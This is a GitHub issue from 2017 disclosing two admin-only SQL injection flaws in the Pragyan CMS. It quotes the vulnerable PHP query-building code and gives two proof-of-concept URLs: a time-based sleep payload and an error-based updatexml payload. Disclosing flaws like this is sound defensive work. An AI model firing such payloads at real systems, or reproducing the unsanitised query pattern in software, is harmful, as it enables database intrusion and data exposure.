Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Found 2 SQL injection vulnerabilities #228

Closed
lnyzx opened this issue Sep 14, 2017 · 1 comment
Closed

Found 2 SQL injection vulnerabilities #228

lnyzx opened this issue Sep 14, 2017 · 1 comment
Assignees

Comments

@lnyzx
Copy link

lnyzx commented Sep 14, 2017

both two vulnerabilities need to login as admin

first in cms/admin.lib.php line 358

function admin($pageid, $userid) {
	if(isset($_GET['doaction']) && $_GET['doaction'] == 'getsuggestions' && isset($_GET['forwhat'])) {
		if(strlen($_GET['forwhat']) >= 3) {
			echo getSuggestions($_GET['forwhat']);
			disconnect();
			exit();
		}
	}

function getSuggestions:

function getSuggestions($pattern) {
	$suggestionsQuery = "SELECT IF(user_email LIKE \"$pattern%\", 1, " .
			"IF(`user_fullname` LIKE \"$pattern%\", 2, " .
			"IF(`user_fullname` LIKE \"% $pattern%\", 3, " .
			"IF(`user_email` LIKE \"%$pattern%\", 4, " .
			"IF(`user_fullname` LIKE \"%$pattern%\", 5, 6" .
			"))))) AS `relevance`,	`user_email`, `user_fullname` FROM `".MYSQL_DATABASE_PREFIX."users` WHERE `user_activated`=1 AND(`user_email` LIKE \"%$pattern%\" OR `user_fullname` LIKE \"%$pattern%\" ) ORDER BY `relevance`";
//			echo $suggestionsQuery;
	$suggestionsResult = mysqli_query($GLOBALS["___mysqli_ston"], $suggestionsQuery);

	$suggestions = array($pattern);

	while($suggestionsRow = mysqli_fetch_row($suggestionsResult)) {
		$suggestions[] = $suggestionsRow[1] . ' - ' . $suggestionsRow[2];
	}

	return join($suggestions, ',');
}

no filter at all, so we can cause a boolean-base sql injection. PoC like:
pragyan/home/+admin&doaction=getsuggestions&forwhat="and sleep(10) and "admin" like "admin

the second one in line 252

function delete_blacklist()
{
	$id = safe_html($_GET['del_black']);
	$query = "DELETE FROM `".MYSQL_DATABASE_PREFIX."blacklist` WHERE `id` = '$id'";
	$result =mysqli_query($GLOBALS["___mysqli_ston"], $query) or displayerror("Unable to Delete blacklist". ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)));
	if(mysqli_affected_rows($GLOBALS["___mysqli_ston"])>0)	
			displayinfo("Blackilist Deleted Successfully");
	return 1;
}

function safe_html():

function safe_html($html)
{
	return htmlspecialchars(strip_tags($html));
}

htmlspecialchars() has nothing to do with sql injection, so we can use error-base sql injection
PoC:pragyan/home/+admin&subaction=global&del_black=4'and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and '1'='1

@ssundarraj ssundarraj assigned ssundarraj and suhithr and unassigned ssundarraj Sep 15, 2017
@ssundarraj
Copy link
Member

@suhithr Find someone to fix this -- shouldn't be too tough. ("admin" permissions should only be given to trusted users so the risk shouldn't be too high.)

shravan97 added a commit to shravan97/pragyan that referenced this issue Oct 21, 2017
@lnyzx lnyzx closed this as completed Dec 4, 2017
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants